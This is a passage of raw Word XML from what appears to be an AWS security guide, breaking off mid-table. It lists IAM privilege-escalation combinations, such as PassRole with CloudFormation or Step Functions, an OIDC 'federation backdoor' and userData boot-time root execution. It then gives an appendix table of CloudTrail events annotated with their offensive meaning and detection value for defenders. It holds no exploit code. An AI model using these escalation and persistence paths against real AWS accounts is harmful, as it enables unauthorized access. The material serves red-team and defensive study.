                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cloudformation:UpdateStack</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:PassRole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F78207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Stack with service role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E832DD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Arbitrary resource creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="398216BA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UpdateStack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="0978AF41" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D9721A6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>states:CreateStateMachine</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:PassRole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49F2A84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Rich role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D2FB1B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Orchestrated exec under role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29C1C393" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CreateStateMachine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="3FE71B85" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75E803B6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:CreateOpenIDConnectProvider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60E358A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Externally reachable IDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CCDAC8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Federation backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="496196E8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CreateOpenIDConnectProvider</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="77D7AA73" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2017A3F8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ec2:ModifyInstanceAttribute</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (userData)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45FA351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Stopped instance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AD37E9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Boot-time RCE as root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EAC020F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ModifyInstanceAttribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27B2F60A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Appendix C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>High-Value CloudTrail Events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1795A5A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CloudTrail events the operator and defender should both track. For the defender, these are the events that carry the highest detection value per unit of volume; for the operator, these are the events that carry the highest detection risk per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3422"/>
        <w:gridCol w:w="1409"/>
        <w:gridCol w:w="1181"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="1DA67DE7" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63004D68" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Table C.1 — High-value CloudTrail events, by event source.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="51C3CDA2" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1738C8B5"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Event source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78788DA9"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Event name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43DF784B"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Offensive meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F169E4C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Defender's value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="4CD38D88" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FB49BC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2EC9695A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CreateAccessKey</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FDB7AC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Credential persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="220249B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473A3F4E" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AE98B3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1C8FDEDC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CreateUser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="566551D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Identity persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0801C6F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 (rare)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="7FBC624F" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="209B63D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0450D930" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AttachUserPolicy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CA8C9E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Permission grant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62555C2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69C43E50" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7914685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1EF46E69" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UpdateAssumeRolePolicy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="223C75A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Trust manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="047A7AC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r>
      <w:tr w:rsidR="00000000" w14:paraId="51DB21FE" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28977B1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565A4778" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CreatePolicyVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6074BB2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Policy rewrite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="793DC5D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79A16BCB" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EB3EE4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37CA08CB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SetDefaultPolicyVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CC0212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Activate stashed policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51C47AA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6F3973B2" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40B14DD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iam.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D05390E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CreateOpenIDConnectProvider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C6AAE2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Federation backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23A7963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r>
      <w:tr w:rsidR="00000000" w14:paraId="7F3F8B15" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A185FB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sts.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="641CA042" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AssumeRole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="393CE75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Role chaining</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70837C2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 (noisy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="75F4F7FC" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43C7A26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sts.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CAF5543" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AssumeRoleWithWebIdentity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D66DC7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OIDC federation use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E253F2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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="128EEF78" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51DA748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sts.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44B66F16" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GetSessionToken</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25D0705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MFA session minting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="487383A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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="2EEB5D71" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="108598D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ec2.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
